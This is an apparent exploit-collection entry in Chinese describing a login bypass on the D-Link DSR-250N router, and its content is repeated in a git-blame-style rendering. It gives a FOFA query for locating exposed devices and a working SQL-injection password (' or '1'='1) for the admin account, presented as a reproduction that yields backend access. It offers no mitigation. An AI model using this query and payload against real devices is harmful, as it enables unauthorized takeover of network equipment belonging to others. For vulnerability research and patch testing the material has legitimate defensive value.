Awesome-POC/network-device/D-Link DSR-250N 万能密码漏洞.md

# D-Link DSR-250N 万能密码漏洞

## 漏洞描述

D-Link DSR-250N 存在万能密码漏洞，攻击者通过漏洞可以获取后台权限

## 漏洞影响

```
D-Link DSR-250N
```

## FOFA

```
app="D_Link-DSR-250N"
```

## 漏洞复现

登录页面如下

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162222919.png)

```plain
user: admin
pass: ' or '1'='1
```

成功登录后台

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162223338.png)
update gitbook 2022-02-20 16:14:31 +08:00			`# D-Link DSR-250N 万能密码漏洞`

			`## 漏洞描述`

			`D-Link DSR-250N 存在万能密码漏洞，攻击者通过漏洞可以获取后台权限`

			`## 漏洞影响`

			```
			`D-Link DSR-250N`
			```

			`## FOFA`

			```
			`app="D_Link-DSR-250N"`
			```

			`## 漏洞复现`

			`登录页面如下`

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162222919.png)`

			```plain
			`user: admin`
			`pass: ' or '1'='1`
			```

			`成功登录后台`

			`![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162223338.png)`